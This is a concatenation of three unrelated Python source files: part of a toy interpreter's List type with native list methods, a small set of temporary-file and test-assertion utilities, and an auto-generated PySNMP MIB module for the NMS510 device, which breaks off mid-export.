return self.__str__()
def __str__(self):
return "<native type 'List'>"
class RocketList(_RocketInstance):
def __init__(self, elms, nin_lexeme):
self.elements = elms
self.nature = 'datatype'
self.kind = "<native type 'List'>"
self.nin_lexeme = nin_lexeme
def get(self, name: _Token):
# Note: 'edna' is what we use to manipulate arity for 'slice' function from '1' to '2'
if name.lexeme == 'get':
rocketCallable = _RocketCallable(self)
def arity():
return 1
def call(interpreter, args):
index = args[0].value
if index >= len(self.elements):
raise _RuntimeError('List', "IndexError: list index out of range")
return self.elements[index]
rocketCallable.arity = arity
rocketCallable.call = call
rocketCallable.toString = "<native method 'get' of list>"
rocketCallable.nature = 'native'
return rocketCallable
if name.lexeme == 'insert':
rocketCallable = _RocketCallable(self)
def arity():
return 2
def call(interpreter, args):
# This fn expects input like the standard Python 'insert' list method
# 'insert(index, item)'
# It requires two args exactly
# where if 'index' is -1 it translates to secone to the last not the last
# to add an item at the end we need to pass the length of the list as the index
# i.e. [list].insert([list].length(), [item])
self.elements.insert(args[0].value, args[1])
return List().call(self, self.elements)
rocketCallable.arity = arity
rocketCallable.call = call
rocketCallable.nature = 'native'
rocketCallable.signature = 'List'
rocketCallable.toString = "<native method 'insert' of List>"
rocketCallable.insert = True
return rocketCallable
if name.lexeme == 'slice':
rocketCallable = _RocketCallable(self)
def arity(inc=False):
if inc:
return 2
return 1
def call(interpreter, args, inc=False):
if inc:
if args[0].value >= len(self.elements) or args[1].value >= len(self.elements):
raise _RuntimeError('List', "IndexError: list index out of range")
# Special case
if (args[0].value >= args[1].value):
return List().call(self, [])
else:
return List().call(self, self.elements[args[0].value:args[1].value])
return List().call(self, self.elements[args[0].value:])
rocketCallable.arity = arity
rocketCallable.call = call
rocketCallable.nature = 'native'
rocketCallable.signature = 'List'
rocketCallable.toString = "<native method 'slice' of List>"
rocketCallable.slice = True
rocketCallable.inc = False
return rocketCallable
if name.lexeme == 'splice':
rocketCallable = _RocketCallable(self)
def arity(inc=False):
if inc:
return 2
return 1
def call(interpreter, args, inc=False):
# If initial index is beyond the limit then nothing is returned
if args[0].value >= len(self.elements):
return List().call(self, [])
removed_list = []
is_negative_index = False
if inc:
# Please note, if the item count is zero then nothing is returned
if args[1].value == 0:
return List().call(self, [])
# Negative steps return nothing irrespective of the index
# ... so we need to perform a negativivty test on the input
if _isValNeg(args[1].value):
return List().call(self, [])
# Handle Positive and negative index
# count is always positive
# Run positivity test for index to determine behaviour (adapted from test above)
if not _isValNeg(args[0].value):
removed_list = self.elements[args[0].value:args[0].value + args[1].value:]
else:
# I.e. when index is negative
idx = args[0].value
# step is the index of the starting elm to the next subseq. 'n' (args[1]) elms
step = (len(self.elements) + args[0].value) + args[1].value
removed_list = self.elements[idx:step:]
is_negative_index = True
else:
# if only index provided then the entire list from the index to end is returned
removed_list = List().call(self, self.elements[args[0].value:])
# Remove list items
# Remember the slices are contiguously stored so we can safely use indexing
# ... by cutting out the first chunk and last chunk then attaching them (surgically)
head = self.elements[0:len(self.elements) + args[0].value] if is_negative_index else self.elements[0:args[0].value]
tail = self.elements[len(self.elements) + args[0].value + args[1].value:] if is_negative_index else self.elements[args[0].value + args[1].value:]
self.elements = head + tail
# return removed list slice
return List().call(self, removed_list)
rocketCallable.arity = arity
rocketCallable.call = call
rocketCallable.nature = 'native'
rocketCallable.signature = 'List'
rocketCallable.toString = "<native method 'splice' of List>"
rocketCallable.splice = True
rocketCallable.inc = False
return rocketCallable
if (name.lexeme == 'append') or (name.lexeme == 'push'):
rocketCallable = _RocketCallable(self)
def arity():
return 1
def call(interpreter, args):
# Internally add new elm
self.elements.append(args[0])
# we return the appended list
return self
rocketCallable.arity = arity
rocketCallable.call = call
rocketCallable.toString = "<native method 'append' of List>"
rocketCallable.nature = 'native'
return rocketCallable
if name.lexeme == 'clear':
rocketCallable = _RocketCallable(self)
def arity():
return 0
def call(interpreter, args):
self.elements = []
# return the newly cleared list
return self
rocketCallable.arity = arity
rocketCallable.call = call
rocketCallable.toString = "<native method 'clear' of List>"
rocketCallable.nature = 'native'
return rocketCallable
if name.lexeme == 'length':
rocketCallable = _RocketCallable(self)
def arity():
return 0
def call(interpreter, args):
if self.notEmpty():
return len(self.elements)
else:
return 0
rocketCallable.arity = arity
rocketCallable.call = call
rocketCallable.toString = "<native method 'length' of List>"
rocketCallable.nature = 'native'
return rocketCallable
if name.lexeme == 'pop':
rocketCallable = _RocketCallable(self)
def arity():
return 0
def call(interpreter, args):
if self.notEmpty():
last = self.elements[-1]
self.elements.remove(last)
return last
else:
raise _RuntimeError('List', "IndexError: cannot pop empty list")
rocketCallable.arity = arity
rocketCallable.call = call
rocketCallable.toString = "<native method 'pop' of List>"
rocketCallable.nature = 'native'
return rocketCallable
if name.lexeme == 'remove':
rocketCallable = _RocketCallable(self)
def arity():
return 1
def call(interpreter, args):
if self.notEmpty():
removed_index = -1
for i in range(len(self.elements) - 1):
if args[0].value == self.elements[i].value:
self.elements.remove(self.elements[i])
removed_index = i
if removed_index == -1:
raise _RuntimeError('List', "IndexError: Item not in list")
else:
return _number.Int().call(self, [removed_index])
else:
raise _RuntimeError('List', "IndexError: cannot remove items from an empty list")
rocketCallable.arity = arity
rocketCallable.call = call
rocketCallable.toString = "<native method 'remove' of List>"
rocketCallable.nature = 'native'
return rocketCallable
if name.lexeme == 'sort':
rocketCallable = _RocketCallable(self)
def arity():
return 0
def call(interpreter, args):
if self.notEmpty():
self.elements.sort()
return None
else:
return None
rocketCallable.arity = arity
rocketCallable.call = call
rocketCallable.toString = "<native method 'sort' of List>"
rocketCallable.nature = 'native'
return rocketCallable
if name.lexeme == 'reverse':
rocketCallable = _RocketCallable(self)
def arity():
return 0
def call(interpreter, args):
if self.notEmpty():
# internally change and return mutation
self.elements.reverse()
return self
else:
return List().call(self, [])
rocketCallable.arity = arity
rocketCallable.call = call
rocketCallable.toString = "<native method 'reverse' of List>"
rocketCallable.nature = 'native'
return rocketCallable
if name.lexeme == 'concat':
rocketCallable = _RocketCallable(self)
def arity():
return 1
def call(interpreter, args):
if isinstance(args[0], RocketList):
# we return the mutation
return List().call(self, self.elements + args[0].elements)
else:
raise _RuntimeError('List', "IndexError: can only concatenate 'List' native type with another 'List'.")
rocketCallable.arity = arity
rocketCallable.call = call
rocketCallable.toString = "<native method 'concat' of List>"
rocketCallable.nature = 'native'
return rocketCallable
if name.lexeme == 'indexOf':
rocketCallable = _RocketCallable(self)
def arity():
return 1
def call(interpreter, args):
if self.notEmpty():
for i in range(len(self.elements)):
if args[0].value == self.elements[i].value:
return _number.Int().call(self, [i])
raise _RuntimeError('List', "IndexError: Item not in list")
else:
raise _RuntimeError('List', "IndexError: cannot index from an empty list")
rocketCallable.arity = arity
rocketCallable.call = call
rocketCallable.toString = "<native method 'indexOf' of List>"
rocketCallable.nature = 'native'
return rocketCallable
if name.lexeme == 'includes':
rocketCallable = _RocketCallable(self)
def arity():
return 1
def call(interpreter, args):
if self.notEmpty():
for i in range(len(self.elements)):
if args[0].value == self.elements[i].value:
return _boolean.Bool().call(self, [True])
return _boolean.Bool().call(self, [False])
else:
raise _RuntimeError('List', "IndexError: cannot index from an empty list")
rocketCallable.arity = arity
rocketCallable.call = call
rocketCallable.toString = "<native method 'includes' of List>"
rocketCallable.nature = 'native'
return rocketCallable
if name.lexeme == 'forEach':
rocketCallable = _RocketCallable(self)
def arity():
return 1
def call(interpreter, args):
if self.notEmpty():
for item in self.elements: args[0].call(interpreter, [item])
else:
raise _RuntimeError('List', "IndexError: cannot run function on an empty list")
rocketCallable.arity = arity
rocketCallable.call = call
rocketCallable.toString = "<native method 'forEach' of List>"
rocketCallable.nature = 'native'
return rocketCallable
else:
raise _RuntimeError(name, f"'List' has no method '{name.lexeme}'.")
def set(self, name, value):
raise _RuntimeError(name, "Cannot mutate an List's props")
def notEmpty(self):
if len(self.elements) == 0:
return False
return True
def stringify(self, elm, uncoloured=False):
if (_isType(elm, RocketArray) or _isType(elm, _list.RocketList)):
return elm.__str__()
if (_isType(elm, _number.RocketInt) or _isType(elm, _number.RocketFloat)):
return f'\033[36m{elm}\033[0m' if not uncoloured else str(elm.value)
if _isType(elm, _string.RocketString):
return f'\033[32m{elm}\033[0m' if not uncoloured else elm.value
if _isType(elm, _boolean.Bool):
return f'\033[1m{elm}\033[0m' if not uncoloured else str(elm.value)
if type(elm) == type(None):
return '\033[1m' + self.nin_lexeme + '\033[0m' if not uncoloured else self.nin_lexeme
def stringifyList(self, list, uncoloured=False):
result = '[ '
# if called to display and empty List
if len(list) == 0:
return []
if len(list) >= 1:
for elm in list[0:-1]:
result += self.stringify(elm, uncoloured) + ", "
result += f"{self.stringify(list[-1], uncoloured)} ]"
else:
result += self.stringify(list[0], uncoloured) + ' ]'
return result
def raw_string(self):
if len(self.elements) > 0:
return self.stringifyList(self.elements, True)
else:
return '[]'
def __repr__(self):
if len(self.elements) >= 1:
return self.stringifyList(self.elements)
else:
return "[]"
def __str__(self):
return self.__repr__()
def __len__(self):
return len(self.elements)
|
from __future__ import absolute_import, division, print_function
from contextlib import contextmanager
import inspect
import datetime
import tempfile
import os
import numpy as np
def raises(err, lamda):
try:
lamda()
return False
except err:
return True
def expand_tuples(L):
"""
>>> expand_tuples([1, (2, 3)])
[(1, 2), (1, 3)]
>>> expand_tuples([1, 2])
[(1, 2)]
"""
if not L:
return [()]
elif not isinstance(L[0], tuple):
rest = expand_tuples(L[1:])
return [(L[0],) + t for t in rest]
else:
rest = expand_tuples(L[1:])
return [(item,) + t for t in rest for item in L[0]]
@contextmanager
def tmpfile(extension=''):
extension = '.' + extension.lstrip('.')
handle, filename = tempfile.mkstemp(extension)
yield filename
try:
if os.path.exists(filename):
os.remove(filename)
except OSError: # Sometimes Windows can't close files
if os.name == 'nt':
os.close(handle)
try:
os.remove(filename)
except OSError: # finally give up
pass
def keywords(func):
""" Get the argument names of a function
>>> def f(x, y=2):
... pass
>>> keywords(f)
['x', 'y']
"""
if isinstance(func, type):
return keywords(func.__init__)
return inspect.getargspec(func).args
def cls_name(cls):
if 'builtin' in cls.__module__:
return cls.__name__
else:
return cls.__module__.split('.')[0] + '.' + cls.__name__
@contextmanager
def filetext(text, extension='', open=open, mode='wt'):
with tmpfile(extension=extension) as filename:
f = open(filename, mode=mode)
try:
f.write(text)
finally:
try:
f.close()
except AttributeError:
pass
yield filename
@contextmanager
def filetexts(d, open=open):
""" Dumps a number of textfiles to disk
d - dict
a mapping from filename to text like {'a.csv': '1,1\n2,2'}
"""
for filename, text in d.items():
f = open(filename, 'wt')
try:
f.write(text)
finally:
try:
f.close()
except AttributeError:
pass
yield list(d)
for filename in d:
if os.path.exists(filename):
os.remove(filename)
def normalize_to_date(dt):
if isinstance(dt, datetime.datetime) and not dt.time():
return dt.date()
else:
return dt
def assert_allclose(lhs, rhs):
for tb in map(zip, lhs, rhs):
for left, right in tb:
if isinstance(left, (np.floating, float)):
# account for nans
assert np.all(np.isclose(left, right, equal_nan=True))
continue
if isinstance(left, datetime.datetime):
left = normalize_to_date(left)
if isinstance(right, datetime.datetime):
right = normalize_to_date(right)
assert left == right
|
#
# PySNMP MIB module NMS510-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NMS510-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:12:45 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint, ConstraintsUnion, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint", "ConstraintsUnion", "ValueRangeConstraint")
dsu, = mibBuilder.importSymbols("DDS-MIB", "dsu")
gdc, = mibBuilder.importSymbols("GDCCMN-MIB", "gdc")
SCinstance, = mibBuilder.importSymbols("GDCMACRO-MIB", "SCinstance")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibScalar, MibTable, MibTableRow, MibTableColumn, ObjectIdentity, Counter64, Bits, Integer32, iso, Gauge32, IpAddress, NotificationType, Counter32, Unsigned32, MibIdentifier, TimeTicks, ModuleIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ObjectIdentity", "Counter64", "Bits", "Integer32", "iso", "Gauge32", "IpAddress", "NotificationType", "Counter32", "Unsigned32", "MibIdentifier", "TimeTicks", "ModuleIdentity")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
nms510 = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6))
nms510MIBversion = MibScalar((1, 3, 6, 1, 4, 1, 498, 8, 6, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(5, 5)).setFixedLength(5)).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510MIBversion.setStatus('mandatory')
nms510UnitCfgTable = MibTable((1, 3, 6, 1, 4, 1, 498, 8, 6, 2), )
if mibBuilder.loadTexts: nms510UnitCfgTable.setStatus('mandatory')
nms510UnitCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1), ).setIndexNames((0, "NMS510-MIB", "nms510UnitCfgIndex"))
if mibBuilder.loadTexts: nms510UnitCfgEntry.setStatus('mandatory')
nms510UnitCfgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510UnitCfgIndex.setStatus('mandatory')
nms510DteCtsDelay = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("ctsOn", 1), ("cts0mSec", 2), ("ctsFixed3Char", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DteCtsDelay.setStatus('mandatory')
nms510DteCtsDelayExt = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("ext0mSec", 1), ("ext30mSec", 2), ("ext60mSec", 3), ("ext90mSec", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DteCtsDelayExt.setStatus('mandatory')
nms510FirmwareLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(2, 2)).setFixedLength(2)).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510FirmwareLevel.setStatus('mandatory')
nms510AlarmCfgCountWindow = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 15))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510AlarmCfgCountWindow.setStatus('mandatory')
nms510SoftReset = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("normal", 1), ("reset", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510SoftReset.setStatus('mandatory')
nms510FrontPanelInhibit = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("fpInhibited", 1), ("fpEnabled", 2), ("execute", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510FrontPanelInhibit.setStatus('mandatory')
nms510FrontPanelEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("fpInhibited", 1), ("fpEnabled", 2), ("execute", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510FrontPanelEnable.setStatus('mandatory')
nms510HdlcInvert = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("normal", 1), ("invert", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510HdlcInvert.setStatus('mandatory')
nms510PiggyBackDetect = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("not-installed", 1), ("installed", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510PiggyBackDetect.setStatus('mandatory')
nms510ExtPortCtrlOut1 = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("on", 1), ("off", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510ExtPortCtrlOut1.setStatus('mandatory')
nms510ExtPortCtrlOut2 = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("on", 1), ("off", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510ExtPortCtrlOut2.setStatus('mandatory')
nms510AlarmData = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4))
nms510NoResponseAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 1))
nms510DiagRxErrAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 2))
nms510PowerUpAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 3))
nms510EEChkSumErrAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 4))
nms510StcLoopbackAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 5))
nms510NoSignalAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 6))
nms510FpTestAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 7))
nms510StreamingAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 8))
nms510DSRLossAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 9))
nms510DTRLossAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 10))
nms510DTPLossAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 11))
nms510DCDLossAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 12))
nms510RXDLossAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 13))
nms510TXDLossAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 14))
nms510DBURequestForScanAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 15))
nms510DBUOnalm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 16))
nms510DBUFailedAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 17))
nms510ExtInputChangeAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 18))
nms510ExtInputLowAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 19))
nms510FrameLossAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 20))
nms510AlarmCfgTable = MibTable((1, 3, 6, 1, 4, 1, 498, 8, 6, 8), )
if mibBuilder.loadTexts: nms510AlarmCfgTable.setStatus('mandatory')
nms510AlarmCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 8, 6, 8, 1), ).setIndexNames((0, "NMS510-MIB", "nms510AlarmCfgIndex"), (0, "NMS510-MIB", "nms510AlarmCfgIdentifier"))
if mibBuilder.loadTexts: nms510AlarmCfgEntry.setStatus('mandatory')
nms510AlarmCfgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 8, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510AlarmCfgIndex.setStatus('mandatory')
nms510AlarmCfgIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 8, 1, 2), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510AlarmCfgIdentifier.setStatus('mandatory')
nms510AlarmCfgThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 8, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 99))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510AlarmCfgThreshold.setStatus('mandatory')
nms510DiagCfgTable = MibTable((1, 3, 6, 1, 4, 1, 498, 8, 6, 6), )
if mibBuilder.loadTexts: nms510DiagCfgTable.setStatus('mandatory')
nms510DiagCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 8, 6, 6, 1), ).setIndexNames((0, "NMS510-MIB", "nms510DiagCfgIndex"))
if mibBuilder.loadTexts: nms510DiagCfgEntry.setStatus('mandatory')
nms510DiagCfgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 6, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510DiagCfgIndex.setStatus('mandatory')
nms510DiagSendCode = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 6, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("sendOtherPattern", 1), ("send511Pattern", 2), ("send2047Pattern", 3), ("send15BitPattern", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DiagSendCode.setStatus('mandatory')
nms510DiagTestExceptions = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 6, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("noExceptions", 1), ("blocksOutOfRange", 2), ("bitsOutOfRange", 3), ("blocksAndBitsOutOfRange", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510DiagTestExceptions.setStatus('mandatory')
nms510DiagBitErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 6, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510DiagBitErrors.setStatus('mandatory')
nms510DiagBlockErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 6, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510DiagBlockErrors.setStatus('mandatory')
nms510DiagTestReset = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 6, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("normal", 1), ("diagnostic", 2), ("resetTest", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DiagTestReset.setStatus('mandatory')
nms510DiagExcTable = MibTable((1, 3, 6, 1, 4, 1, 498, 8, 6, 7), )
if mibBuilder.loadTexts: nms510DiagExcTable.setStatus('mandatory')
nms510DiagExcEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 8, 6, 7, 1), ).setIndexNames((0, "NMS510-MIB", "nms510DiagExcIndex"))
if mibBuilder.loadTexts: nms510DiagExcEntry.setStatus('mandatory')
nms510DiagExcIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 7, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510DiagExcIndex.setStatus('mandatory')
nms510DiagIntLineloop = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 7, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10))).clone(namedValues=NamedValues(("lineloopOff", 1), ("lineloopOn", 2), ("blocks1", 3), ("blocks10", 4), ("blocks100", 5), ("blocks500", 6), ("blocks1000", 7), ("blocks5000", 8), ("blocks10000", 9), ("blocks50000", 10)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DiagIntLineloop.setStatus('mandatory')
nms510DiagIntDataloop = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 7, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10))).clone(namedValues=NamedValues(("dataloopOff", 1), ("dataloopOn", 2), ("blocks1", 3), ("blocks10", 4), ("blocks100", 5), ("blocks500", 6), ("blocks1000", 7), ("blocks5000", 8), ("blocks10000", 9), ("blocks50000", 10)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DiagIntDataloop.setStatus('mandatory')
nms510DiagEndToEndSelftest = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 7, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10))).clone(namedValues=NamedValues(("endToEndOff", 1), ("endToEndOn", 2), ("blocks1", 3), ("blocks10", 4), ("blocks100", 5), ("blocks500", 6), ("blocks1000", 7), ("blocks5000", 8), ("blocks10000", 9), ("blocks50000", 10)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DiagEndToEndSelftest.setStatus('mandatory')
nms510DiagNetworkDelay = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 7, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("delayTestOff", 1), ("delayTestOn", 2), ("runDelayTest", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DiagNetworkDelay.setStatus('mandatory')
nms510DiagTestStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 7, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("noTest", 1), ("internalLineloop", 2), ("externalDataloop", 3), ("internalDataloop", 4), ("serviceTestCenterLoop", 5), ("endToend", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510DiagTestStatus.setStatus('mandatory')
nms510DiagExtDataloop = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 7, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("dataloopOff", 1), ("dataloopOn", 2), ("external", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DiagExtDataloop.setStatus('mandatory')
mibBuilder.exportSymbols("NMS510-MIB", nms510StreamingAlm=nms510StreamingAlm, nms510PowerUpAlm=nms510PowerUpAlm, nms510ExtPortCtrlOut1=nms510ExtPortCtrlOut1, nms510DiagTestExceptions=nms510DiagTestExceptions, nms510DteCtsDelayExt=nms510DteCtsDelayExt, nms510SoftReset=nms510SoftReset, nms510=nms510, nms510DSRLossAlm=nms510DSRLossAlm, nms510DiagCfgEntry=nms510DiagCfgEntry, nms510DiagBitErrors=nms510DiagBitErrors, nms510DiagExtDataloop=nms510DiagExtDataloop, nms510DTRLossAlm=nms510DTRLossAlm, nms510DiagNetworkDelay=nms510DiagNetworkDelay, nms510DiagEndToEndSelftest=nms510DiagEndToEndSelftest, nms510MIBversion=nms510MIBversion, nms510ExtInputLowAlm=nms510ExtInputLowAlm, nms510UnitCfgTable=nms510UnitCfgTable, nms510ExtInputChangeAlm=nms510ExtInputChangeAlm, nms510AlarmCfgTable=nms510AlarmCfgTable, nms510FirmwareLevel=nms510FirmwareLevel, nms510PiggyBackDetect=nms510PiggyBackDetect, nms510DBUOnalm=nms510DBUOnalm, nms510NoSignalAlm=nms510NoSignalAlm, nms510AlarmCfgEntry=nms510AlarmCfgEntry, nms510AlarmData=nms510AlarmData, nms510DBURequestForScanAlm=nms510DBURequestForScanAlm, nms510DBUFailedAlm=nms510DBUFailedAlm, nms510DiagIntDataloop=nms510DiagIntDataloop, nms510DiagRxErrAlm=nms510DiagRxErrAlm, nms510NoResponseAlm=nms510NoResponseAlm, nms510FrameLossAlm=nms510FrameLossAlm, nms510FrontPanelInhibit=nms510FrontPanelInhibit, nms510FrontPanelEnable=nms510FrontPanelEnable, nms510UnitCfgEntry=nms510UnitCfgEntry, nms510StcLoopbackAlm=nms510StcLoopbackAlm, nms510DTPLossAlm=nms510DTPLossAlm, nms510TXDLossAlm=nms510TXDLossAlm, nms510DiagExcIndex=nms510DiagExcIndex, nms510UnitCfgIndex=nms510UnitCfgIndex, nms510DteCtsDelay=nms510DteCtsDelay, nms510HdlcInvert=nms510HdlcInvert, nms510DiagCfgIndex=nms510DiagCfgIndex, 